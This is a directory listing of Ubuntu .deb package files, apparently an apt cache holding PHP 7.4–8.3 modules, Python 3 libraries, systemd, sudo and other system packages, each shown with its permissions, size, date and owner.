0644
php7.4-dev_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
422.508 KB
December 19 2025 8:16:51
root
0644
php7.4-fpm_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.52 MB
July 04 2025 1:46:16
root
0644
php7.4-fpm_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.51 MB
December 19 2025 8:16:51
root
0644
php7.4-gd_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
31.174 KB
July 04 2025 1:46:16
root
0644
php7.4-gd_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
29.982 KB
December 19 2025 8:16:51
root
0644
php7.4-igbinary_3.2.16-6+ubuntu24.04.1+deb.sury.org+1_amd64.deb
35.877 KB
November 24 2025 2:40:47
root
0644
php7.4-imagick_3.8.1-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
107.59 KB
December 20 2025 3:54:00
root
0644
php7.4-imap_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
34.275 KB
July 04 2025 1:46:16
root
0644
php7.4-imap_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
32.867 KB
December 19 2025 8:16:50
root
0644
php7.4-intl_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
136.861 KB
July 04 2025 1:46:15
root
0644
php7.4-intl_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
132.467 KB
December 19 2025 8:16:50
root
0644
php7.4-json_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
20.096 KB
July 04 2025 1:46:15
root
0644
php7.4-json_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
20.139 KB
December 19 2025 8:16:50
root
0644
php7.4-mbstring_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
469.674 KB
July 04 2025 1:46:15
root
0644
php7.4-mbstring_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
446.402 KB
December 19 2025 8:16:49
root
0644
php7.4-mysql_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
133.938 KB
July 04 2025 1:46:14
root
0644
php7.4-mysql_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
129.018 KB
December 19 2025 8:16:49
root
0644
php7.4-opcache_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
214.637 KB
July 04 2025 1:46:14
root
0644
php7.4-opcache_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
214.307 KB
December 19 2025 8:16:48
root
0644
php7.4-readline_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
13.002 KB
July 04 2025 1:46:13
root
0644
php7.4-readline_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
12.949 KB
December 19 2025 8:16:48
root
0644
php7.4-redis_6.3.0-2+ubuntu24.04.1+deb.sury.org+1_amd64.deb
192.523 KB
November 24 2025 2:40:24
root
0644
php7.4-soap_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
123.352 KB
July 04 2025 1:46:12
root
0644
php7.4-soap_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
121.914 KB
December 19 2025 8:16:47
root
0644
php7.4-xml_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
108.348 KB
July 04 2025 1:46:10
root
0644
php7.4-xml_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
107.053 KB
December 19 2025 8:16:47
root
0644
php7.4-xmlrpc_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
13.834 KB
July 04 2025 1:46:10
root
0644
php7.4-xmlrpc_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
13.801 KB
December 19 2025 8:16:47
root
0644
php7.4-zip_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
23.258 KB
July 04 2025 1:46:09
root
0644
php7.4-zip_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
22.719 KB
December 19 2025 8:16:47
root
0644
php7.4_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_all.deb
53.426 KB
July 04 2025 1:46:18
root
0644
php7.4_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_all.deb
50.459 KB
December 19 2025 8:16:54
root
0644
php8.2-cli_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.8 MB
July 03 2025 11:30:55
root
0644
php8.2-cli_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.8 MB
December 19 2025 9:10:22
root
0644
php8.2-common_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
721.373 KB
July 03 2025 11:30:55
root
0644
php8.2-common_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
714.545 KB
December 19 2025 9:10:21
root
0644
php8.2-curl_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
39.6 KB
July 03 2025 11:30:54
root
0644
php8.2-curl_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
38.484 KB
December 19 2025 9:10:21
root
0644
php8.2-fpm_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.81 MB
July 03 2025 11:30:54
root
0644
php8.2-fpm_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.8 MB
December 19 2025 9:10:21
root
0644
php8.2-gd_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
32.271 KB
July 03 2025 11:30:53
root
0644
php8.2-gd_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
30.73 KB
December 19 2025 9:10:20
root
0644
php8.2-igbinary_3.2.16-6+ubuntu24.04.1+deb.sury.org+1_amd64.deb
37.24 KB
November 24 2025 2:40:46
root
0644
php8.2-mbstring_8.2.23-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
523.961 KB
August 30 2024 6:35:52
root
0644
php8.2-mbstring_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
524.176 KB
July 03 2025 11:30:52
root
0644
php8.2-mbstring_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
496.586 KB
December 19 2025 9:10:19
root
0644
php8.2-mysql_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
129.234 KB
July 03 2025 11:30:51
root
0644
php8.2-mysql_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
124.23 KB
December 19 2025 9:10:19
root
0644
php8.2-opcache_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
362.604 KB
July 03 2025 11:30:51
root
0644
php8.2-opcache_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
363.797 KB
December 19 2025 9:10:19
root
0644
php8.2-readline_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
13.383 KB
July 03 2025 11:30:50
root
0644
php8.2-readline_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
13.166 KB
December 19 2025 9:10:18
root
0644
php8.2-redis_6.3.0-2+ubuntu24.04.1+deb.sury.org+1_amd64.deb
198.311 KB
November 24 2025 2:40:23
root
0644
php8.2-xml_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
121.818 KB
July 03 2025 11:30:49
root
0644
php8.2-xml_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
119.773 KB
December 19 2025 9:10:17
root
0644
php8.2-zip_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
28.844 KB
July 03 2025 11:30:49
root
0644
php8.2-zip_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
27.977 KB
December 19 2025 9:10:17
root
0644
php8.2_8.2.29-1+ubuntu22.04.1+deb.sury.org+1_all.deb
49.336 KB
July 03 2025 11:30:55
root
0644
php8.2_8.2.30-1+ubuntu24.04.1+deb.sury.org+1_all.deb
47.248 KB
December 19 2025 9:10:23
root
0644
php8.3-cli_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.84 MB
August 29 2025 9:56:23
root
0644
php8.3-cli_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.84 MB
December 19 2025 9:10:16
root
0644
php8.3-common_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
759.605 KB
August 29 2025 9:56:22
root
0644
php8.3-common_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
756.645 KB
December 19 2025 9:10:16
root
0644
php8.3-curl_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
39.709 KB
August 29 2025 9:56:22
root
0644
php8.3-curl_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
39.904 KB
December 19 2025 9:10:16
root
0644
php8.3-dev_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
516.385 KB
August 29 2025 9:56:21
root
0644
php8.3-dev_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
515.598 KB
December 19 2025 9:10:15
root
0644
php8.3-fpm_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.85 MB
August 29 2025 9:56:20
root
0644
php8.3-fpm_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.84 MB
December 19 2025 9:10:15
root
0644
php8.3-gd_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
32.607 KB
August 29 2025 9:56:20
root
0644
php8.3-gd_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
31.205 KB
December 19 2025 9:10:15
root
0644
php8.3-imagick_3.8.1-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
108.85 KB
December 20 2025 3:54:00
root
0644
php8.3-imap_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
35.625 KB
August 29 2025 9:56:19
root
0644
php8.3-imap_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
34.041 KB
December 19 2025 9:10:14
root
0644
php8.3-intl_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
160.014 KB
August 29 2025 9:56:19
root
0644
php8.3-intl_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
153.734 KB
December 19 2025 9:10:14
root
0644
php8.3-mbstring_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
526.309 KB
August 29 2025 9:56:19
root
0644
php8.3-mbstring_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
499.945 KB
December 19 2025 9:10:13
root
0644
php8.3-mysql_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
128.416 KB
August 29 2025 9:56:18
root
0644
php8.3-mysql_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
123.738 KB
December 19 2025 9:10:13
root
0644
php8.3-opcache_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
364.842 KB
August 29 2025 9:56:18
root
0644
php8.3-opcache_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
365.18 KB
December 19 2025 9:10:12
root
0644
php8.3-readline_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
13.215 KB
August 29 2025 9:56:18
root
0644
php8.3-readline_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
13.119 KB
December 19 2025 9:10:11
root
0644
php8.3-soap_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
132.188 KB
August 29 2025 9:56:17
root
0644
php8.3-soap_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
131.988 KB
December 19 2025 9:10:11
root
0644
php8.3-xml_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
127.635 KB
August 29 2025 9:56:17
root
0644
php8.3-xml_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
124.834 KB
December 19 2025 9:10:10
root
0644
php8.3-xmlrpc_3%3a1.0.0~rc3-11+ubuntu24.04.1+deb.sury.org+1_amd64.deb
16.664 KB
November 24 2025 2:40:08
root
0644
php8.3-zip_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
29.834 KB
August 29 2025 9:56:17
root
0644
php8.3-zip_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_amd64.deb
29.061 KB
December 19 2025 9:10:10
root
0644
php8.3_8.3.25-1+ubuntu22.04.1+deb.sury.org+1_all.deb
46.326 KB
August 29 2025 9:56:23
root
0644
php8.3_8.3.29-1+ubuntu24.04.1+deb.sury.org+1_all.deb
47.611 KB
December 19 2025 9:10:16
root
0644
pinentry-curses_1.2.1-3ubuntu5_amd64.deb
34.418 KB
April 01 2024 1:46:43
root
0644
pkexec_124-2ubuntu1.24.04.2_amd64.deb
15.494 KB
December 03 2024 6:34:45
root
0644
pkg-config_1.8.1-2build1_amd64.deb
7.094 KB
April 09 2024 1:02:40
root
0644
pkg-php-tools_1.44_all.deb
31.973 KB
January 29 2023 7:24:02
root
0644
pkgconf-bin_1.8.1-2build1_amd64.deb
20.244 KB
April 09 2024 1:02:40
root
0644
pkgconf_1.8.1-2build1_amd64.deb
16.396 KB
April 09 2024 1:02:40
root
0644
plymouth-theme-ubuntu-text_24.004.60-1ubuntu7.1_amd64.deb
9.691 KB
March 07 2025 7:49:46
root
0644
plymouth_24.004.60-1ubuntu7.1_amd64.deb
130.73 KB
March 07 2025 7:49:46
root
0644
policykit-1_124-2ubuntu1.24.04.2_amd64.deb
3.441 KB
December 03 2024 6:34:45
root
0644
polkitd_124-2ubuntu1.24.04.2_amd64.deb
93.012 KB
December 03 2024 6:34:45
root
0644
poppler-data_0.4.12-1_all.deb
1.96 MB
February 10 2023 1:45:19
root
0644
popularity-contest_1.77ubuntu1_all.deb
56.977 KB
July 19 2023 6:49:27
root
0644
powermgmt-base_1.36ubuntu0.22.04.1_all.deb
7.555 KB
July 02 2025 5:29:56
root
0644
powermgmt-base_1.37ubuntu0.1_all.deb
7.471 KB
July 02 2025 5:30:38
root
0644
procps_2%3a3.3.17-6ubuntu2.1_amd64.deb
368.879 KB
November 14 2023 5:04:23
root
0644
procps_2%3a4.0.4-4ubuntu3.2_amd64.deb
690.551 KB
September 28 2024 5:09:53
root
0644
psmisc_23.7-1build1_amd64.deb
174.91 KB
April 01 2024 1:46:42
root
0644
publicsuffix_20231001.0357-0.1_all.deb
125.963 KB
October 27 2023 1:33:58
root
0644
python-apt-common_2.4.0ubuntu3_all.deb
14.287 KB
February 13 2024 11:59:42
root
0644
python-apt-common_2.7.7ubuntu5.1_all.deb
20.303 KB
December 09 2025 2:10:58
root
0644
python3-acme_1.21.0-1ubuntu0.1_all.deb
35.506 KB
May 27 2023 7:39:11
root
0644
python3-apt_2.4.0ubuntu3_amd64.deb
160.143 KB
February 13 2024 11:59:42
root
0644
python3-apt_2.7.7ubuntu5.1_amd64.deb
165.238 KB
December 09 2025 2:10:58
root
0644
python3-augeas_0.5.0-1.1_all.deb
8.91 KB
October 26 2019 8:25:46
root
0644
python3-blinker_1.7.0-1_all.deb
13.977 KB
December 10 2023 7:31:56
root
0644
python3-bpfcc_0.29.1+ds-1ubuntu7_all.deb
39.223 KB
April 19 2024 12:44:16
root
0644
python3-certbot-apache_1.21.0-1_all.deb
62.65 KB
November 23 2021 12:49:13
root
0644
python3-certbot_1.21.0-1build1_all.deb
171.023 KB
February 17 2022 2:00:17
root
0644
python3-certifi_2020.6.20-1_all.deb
146.738 KB
October 25 2020 4:38:36
root
0644
python3-cffi-backend_1.16.0-2build1_amd64.deb
75.48 KB
April 09 2024 1:55:08
root
0644
python3-chardet_4.0.0-1_all.deb
95.656 KB
December 31 2020 9:39:17
root
0644
python3-commandnotfound_23.04.0_all.deb
11.102 KB
January 20 2023 10:09:52
root
0644
python3-configargparse_1.5.3-1_all.deb
26.256 KB
November 26 2021 7:29:01
root
0644
python3-configobj_5.0.6-5ubuntu0.1_all.deb
34.094 KB
September 26 2024 11:51:48
root
0644
python3-cryptography_41.0.7-4ubuntu0.1_amd64.deb
791.385 KB
May 27 2024 10:55:18
root
0644
python3-dbus_1.3.2-5build3_amd64.deb
97.721 KB
April 01 2024 9:55:35
root
0644
python3-distro-info_1.1ubuntu0.2_all.deb
6.4 KB
December 09 2023 1:27:14
root
0644
python3-distro-info_1.7build1_all.deb
6.91 KB
April 09 2024 12:10:58
root
0644
python3-distro_1.9.0-1_all.deb
18.566 KB
December 30 2023 7:47:30
root
0644
python3-distupgrade_1%3a22.04.19_all.deb
103.955 KB
February 14 2024 11:08:47
root
0644
python3-distupgrade_1%3a24.04.27_all.deb
121.609 KB
July 29 2025 5:32:30
root
0644
python3-gdbm_3.10.8-1~22.04_amd64.deb
16.32 KB
June 29 2023 11:29:27
root
0644
python3-gdbm_3.12.3-0ubuntu1_amd64.deb
16.133 KB
April 12 2024 9:58:16
root
0644
python3-gi_3.42.1-0ubuntu1_amd64.deb
223.16 KB
July 06 2022 4:59:35
root
0644
python3-gi_3.48.2-1_amd64.deb
226.578 KB
April 07 2024 11:17:21
root
0644
python3-httplib2_0.20.4-3_all.deb
29.648 KB
January 03 2023 7:19:45
root
0644
python3-icu_2.8.1-0ubuntu2_amd64.deb
527.465 KB
March 18 2022 4:05:10
root
0644
python3-idna_3.3-1ubuntu0.1_all.deb
50.896 KB
May 21 2024 10:00:28
root
0644
python3-importlib-metadata_4.12.0-1_all.deb
17.404 KB
November 06 2022 12:04:38
root
0644
python3-jaraco.classes_3.2.1-4_all.deb
6.375 KB
August 08 2023 7:24:11
root
0644
python3-jeepney_0.8.0-3_all.deb
33.855 KB
December 03 2022 7:29:29
root
0644
python3-josepy_1.10.0-1_all.deb
21.445 KB
November 12 2021 7:24:20
root
0644
python3-jwt_2.7.0-1_all.deb
20.404 KB
June 15 2023 7:44:18
root
0644
python3-keyring_24.3.1-1_all.deb
39.33 KB
March 03 2024 3:05:39
root
0644
python3-launchpadlib_1.11.0-6_all.deb
123.574 KB
February 27 2024 4:53:58
root
0644
python3-lazr.restfulclient_0.14.6-1_all.deb
49.598 KB
January 10 2024 1:45:29
root
0644
python3-lazr.uri_1.0.6-3_all.deb
13.176 KB
December 11 2022 1:29:27
root
0644
python3-markdown-it_3.0.0-2_all.deb
56.119 KB
June 20 2023 7:19:29
root
0644
python3-mdurl_0.1.2-1_all.deb
9.475 KB
November 06 2022 12:33:49
root
0644
python3-minimal_3.10.6-1~22.04.1_amd64.deb
23.734 KB
August 09 2024 5:01:59
root
0644
python3-minimal_3.12.3-0ubuntu2.1_amd64.deb
26.799 KB
November 13 2025 12:32:04
root
0644
python3-more-itertools_10.2.0-1_all.deb
51.666 KB
January 30 2024 7:50:26
root
0644
python3-nacl_1.5.0-4build1_amd64.deb
56.568 KB
April 09 2024 1:02:36
root
0644
python3-netaddr_0.8.0-2ubuntu1_all.deb
311.08 KB
September 23 2023 4:49:18
root
0644
python3-netifaces_0.11.0-2build3_amd64.deb
17.627 KB
April 09 2024 1:02:46
root
0644
python3-netplan_1.1.2-2~ubuntu24.04.2_amd64.deb
23.693 KB
July 02 2025 7:42:04
root
0644
python3-oauthlib_3.2.2-1_all.deb
87.564 KB
January 09 2023 7:29:11
root
0644
python3-openssl_21.0.0-1_all.deb
44.189 KB
October 19 2021 5:19:52
root
0644
python3-parsedatetime_2.6-2_all.deb
32.127 KB
October 19 2021 2:21:42
root
0644
python3-pkg-resources_59.6.0-1.2ubuntu0.22.04.1_all.deb
129.352 KB
January 23 2023 5:18:38
root
0644
python3-pkg-resources_59.6.0-1.2ubuntu0.22.04.3_all.deb
129.623 KB
May 29 2025 6:15:46
root
0644
python3-pkg-resources_68.1.2-2ubuntu1.2_all.deb
163.979 KB
May 29 2025 6:15:47
root
0644
python3-pygments_2.17.2+dfsg-1_all.deb
799.889 KB
February 03 2024 7:39:55
root
0644
python3-pymacaroons_0.13.0-6_all.deb
13.1 KB
November 06 2022 1:38:05
root
0644
python3-pyparsing_3.1.1-1_all.deb
84.172 KB
October 27 2023 1:33:57
root
0644
python3-requests-toolbelt_0.9.1-1_all.deb
37.094 KB
December 23 2020 1:30:09
root
0644
python3-rfc3339_1.1-3_all.deb
6.943 KB
October 19 2021 5:19:53
root
0644
python3-rich_13.7.1-1_all.deb
184.803 KB
March 05 2024 1:38:34
root
0644
python3-secretstorage_3.3.3-3_all.deb
13.395 KB
January 10 2024 7:15:39
root
0644
python3-six_1.16.0-4_all.deb
12.119 KB
August 18 2022 9:39:09
root
0644
python3-software-properties_0.99.49.3_all.deb
29.229 KB
August 07 2025 4:58:30
root
0644
python3-tz_2022.1-1ubuntu0.22.04.1_all.deb
29.992 KB
April 01 2023 2:19:40
root
0644
python3-update-manager_1%3a22.04.22_all.deb
38.305 KB
May 08 2025 5:48:28
root
0644
python3-update-manager_1%3a24.04.12_all.deb
42.424 KB
April 30 2025 3:38:37
root
0644
python3-wadllib_1.3.6-5_all.deb
35.016 KB
August 15 2023 1:45:02
root
0644
python3-yaml_6.0.1-2build2_amd64.deb
119.695 KB
April 01 2024 10:51:46
root
0644
python3-zipp_1.0.0-6ubuntu0.1_all.deb
6.615 KB
July 23 2024 3:46:08
root
0644
python3-zope.component_4.3.0-3_all.deb
37.402 KB
October 26 2019 9:30:42
root
0644
python3-zope.event_4.4-3_all.deb
7.988 KB
June 18 2020 7:28:56
root
0644
python3-zope.hookable_5.1.0-1build1_amd64.deb
11.314 KB
March 18 2022 4:44:31
root
0644
python3-zope.interface_5.4.0-1build1_amd64.deb
138.602 KB
March 18 2022 2:09:18
root
0644
python3.10-minimal_3.10.12-1~22.04.11_amd64.deb
2.16 MB
August 22 2025 3:45:59
root
0644
python3.10-minimal_3.10.12-1~22.04.5_amd64.deb
2.14 MB
July 30 2024 9:56:30
root
0644
python3.10_3.10.12-1~22.04.11_amd64.deb
496.574 KB
August 22 2025 3:45:59
root
0644
python3.10_3.10.12-1~22.04.5_amd64.deb
496.584 KB
July 30 2024 9:56:29
root
0644
python3.12-minimal_3.12.3-1ubuntu0.9_amd64.deb
2.22 MB
November 25 2025 12:29:09
root
0644
python3.12_3.12.3-1ubuntu0.9_amd64.deb
635.48 KB
November 25 2025 12:29:09
root
0644
python3_3.10.6-1~22.04.1_amd64.deb
22.232 KB
August 09 2024 5:02:00
root
0644
python3_3.12.3-0ubuntu2.1_amd64.deb
22.465 KB
November 13 2025 12:32:04
root
0644
rclone_1.60.1+dfsg-3ubuntu0.24.04.4_amd64.deb
15.71 MB
September 17 2025 10:04:52
root
0644
readline-common_8.2-4build1_all.deb
55.16 KB
March 31 2024 5:08:30
root
0644
redis-server_5%3a7.0.15-1ubuntu0.24.04.2_amd64.deb
50.467 KB
October 15 2025 11:36:48
root
0644
redis-tools_5%3a7.0.15-1ubuntu0.24.04.2_amd64.deb
1.11 MB
October 15 2025 11:36:48
root
0644
rpcsvc-proto_1.4.2-0ubuntu7_amd64.deb
65.865 KB
April 09 2024 1:02:34
root
0644
rsync_3.2.7-0ubuntu0.22.04.2_amd64.deb
425.889 KB
March 06 2023 8:58:42
root
0644
rsync_3.2.7-1ubuntu1.2_amd64.deb
426.125 KB
January 17 2025 1:00:13
root
0644
rsyslog_8.2112.0-2ubuntu2.2_amd64.deb
485.072 KB
May 06 2022 2:48:58
root
0644
rsyslog_8.2312.0-3ubuntu9.1_amd64.deb
499.07 KB
March 14 2025 7:15:40
root
0644
sed_4.9-2build1_amd64.deb
188.877 KB
April 09 2024 1:02:33
root
0644
sensible-utils_0.0.22_all.deb
21.936 KB
February 15 2024 8:30:54
root
0644
sgml-base_1.31_all.deb
11.178 KB
November 06 2022 12:03:11
root
0644
shared-mime-info_2.4-4_amd64.deb
462.473 KB
April 02 2024 3:37:40
root
0644
software-properties-common_0.99.49.3_all.deb
14.086 KB
August 07 2025 4:58:30
root
0644
ssh-import-id_5.11-0ubuntu2.24.04.1_all.deb
9.902 KB
November 29 2024 5:11:20
root
0644
ssl-cert_1.1.2ubuntu1_all.deb
17.408 KB
October 03 2023 6:03:23
root
0644
strace_6.8-0ubuntu2_amd64.deb
570.48 KB
April 19 2024 1:10:01
root
0644
sudo_1.9.15p5-3ubuntu5.24.04.1_amd64.deb
925.398 KB
June 30 2025 11:43:49
root
0644
sudo_1.9.9-1ubuntu2.4_amd64.deb
801.352 KB
April 11 2023 10:23:47
root
0644
sudo_1.9.9-1ubuntu2.5_amd64.deb
801.24 KB
June 30 2025 11:43:46
root
0644
sysstat_12.6.1-2_amd64.deb
477.84 KB
April 12 2024 5:48:18
root
0644
systemd-dev_255.4-1ubuntu8.11_all.deb
103.223 KB
September 02 2025 6:56:24
root
0644
systemd-hwe-hwdb_255.1.6_all.deb
3.598 KB
October 02 2025 3:19:11
root
0644
systemd-resolved_255.4-1ubuntu8.11_amd64.deb
289.43 KB
September 02 2025 6:56:23
root
0644
systemd-sysv_249.11-0ubuntu3.12_amd64.deb
10.215 KB
January 06 2024 4:05:32
root
0644
systemd-sysv_249.11-0ubuntu3.16_amd64.deb
10.217 KB
June 09 2025 10:51:01
root
0644
systemd-sysv_255.4-1ubuntu8.11_amd64.deb
11.602 KB
September 02 2025 6:56:23
root
0644
systemd-timesyncd_249.11-0ubuntu3.12_amd64.deb
30.453 KB
January 06 2024 4:05:32
root
0644
systemd-timesyncd_249.11-0ubuntu3.16_amd64.deb
30.451 KB
June 09 2025 10:50:59
root
0644
systemd-timesyncd_255.4-1ubuntu8.11_amd64.deb
34.469 KB
September 02 2025 6:56:22
root
0644
systemd_249.11-0ubuntu3.12_amd64.deb
4.37 MB
January 06 2024 4:05:33
root
0644
systemd_249.11-0ubuntu3.16_amd64.deb
4.37 MB
June 09 2025 10:51:01
root
0644
systemd_255.4-1ubuntu8.11_amd64.deb
3.31 MB
September 02 2025 6:56:25
root
0644
sysvinit-utils_3.08-6ubuntu3_amd64.deb
33.369 KB
April 09 2024 3:24:18
root
0644
tar_1.34+dfsg-1ubuntu0.1.22.04.2_amd64.deb
288.051 KB
December 11 2023 7:50:10
root
0644
tar_1.35+dfsg-3build1_amd64.deb
247.459 KB
April 09 2024 3:24:17
root
0644
tasksel-data_3.75ubuntu1_all.deb
18.705 KB
February 29 2024 10:38:58
root
0644
tasksel_3.75ubuntu1_all.deb
53.002 KB
February 29 2024 10:38:58
root
0644
tcpdump_4.99.1-3ubuntu0.2_amd64.deb
489.711 KB
February 09 2024 6:00:07
root
0644
telnet_0.17+2.5-3ubuntu4_all.deb
3.598 KB
March 31 2024 8:36:55
root
0644
time_1.9-0.2build1_amd64.deb
44.186 KB
April 09 2024 3:24:17
root
0644
tnftp_20230507-2build3_amd64.deb
100.945 KB
April 08 2024 11:20:45
root
0644
trace-cmd_3.2-1ubuntu2_amd64.deb
328.262 KB
April 09 2024 6:33:47
root
0644
tzdata_2024a-0ubuntu0.22.04.1_all.deb
340.406 KB
May 10 2024 9:20:01
root
0644
tzdata_2025b-0ubuntu0.22.04.1_all.deb
338.873 KB
April 25 2025 5:04:27
root
0644
tzdata_2025b-0ubuntu0.24.04.1_all.deb
269.283 KB
April 25 2025 5:04:32
root
0644
ubuntu-advantage-tools_36ubuntu0~22.04_all.deb
10.654 KB
June 25 2025 5:40:26
root
0644
ubuntu-advantage-tools_37.1ubuntu0~24.04_all.deb
10.693 KB
November 04 2025 1:58:21
root
0644
ubuntu-kernel-accessories_1.539.2_amd64.deb
10.609 KB
January 31 2025 7:19:03
root
0644
ubuntu-keyring_2023.11.28.1_all.deb
10.863 KB
November 28 2023 10:10:41
root
0644
ubuntu-minimal_1.481.3_amd64.deb
2.678 KB
July 24 2024 5:01:57
root
0644
ubuntu-minimal_1.539.2_amd64.deb
10.83 KB
January 31 2025 7:19:02
root
0644
ubuntu-pro-client-l10n_36ubuntu0~22.04_amd64.deb
20.154 KB
June 25 2025 5:40:26
root
0644
ubuntu-pro-client-l10n_37.1ubuntu0~24.04_amd64.deb
19.344 KB
November 04 2025 1:58:21
root
0644
ubuntu-pro-client_36ubuntu0~22.04_amd64.deb
231.4 KB
June 25 2025 5:40:26
root
0644
ubuntu-pro-client_37.1ubuntu0~24.04_amd64.deb
252.986 KB
November 04 2025 1:58:21
root
0644
ubuntu-release-upgrader-core_1%3a22.04.19_all.deb
25.578 KB
February 14 2024 11:08:47
root
0644
ubuntu-release-upgrader-core_1%3a24.04.27_all.deb
26.961 KB
July 29 2025 5:32:30
root
0644
ubuntu-standard_1.481.3_amd64.deb
2.699 KB
July 24 2024 5:01:57
root
0644
ubuntu-standard_1.539.2_amd64.deb
10.854 KB
January 31 2025 7:19:02
root
0644
ucf_3.0043+nmu1_all.deb
55.197 KB
February 05 2023 8:55:18
root
0644
udev_249.11-0ubuntu3.16_amd64.deb
1.49 MB
June 09 2025 10:51:02
root
0644
udev_255.4-1ubuntu8.11_amd64.deb
1.79 MB
September 02 2025 6:56:22
root
0644
ufw_0.36.1-4ubuntu0.1_all.deb
158.563 KB
July 22 2023 1:34:00
root
0644
ufw_0.36.2-6_all.deb
165.119 KB
March 31 2024 8:36:39
root
0644
unattended-upgrades_2.9.1+nmu4ubuntu1_all.deb
49.998 KB
February 13 2024 2:03:29
root
0644
unzip_6.0-28ubuntu4.1_amd64.deb
170.365 KB
October 03 2024 8:35:58
root
0644
update-manager-core_1%3a22.04.22_all.deb
11.281 KB
May 08 2025 5:48:28
root
0644
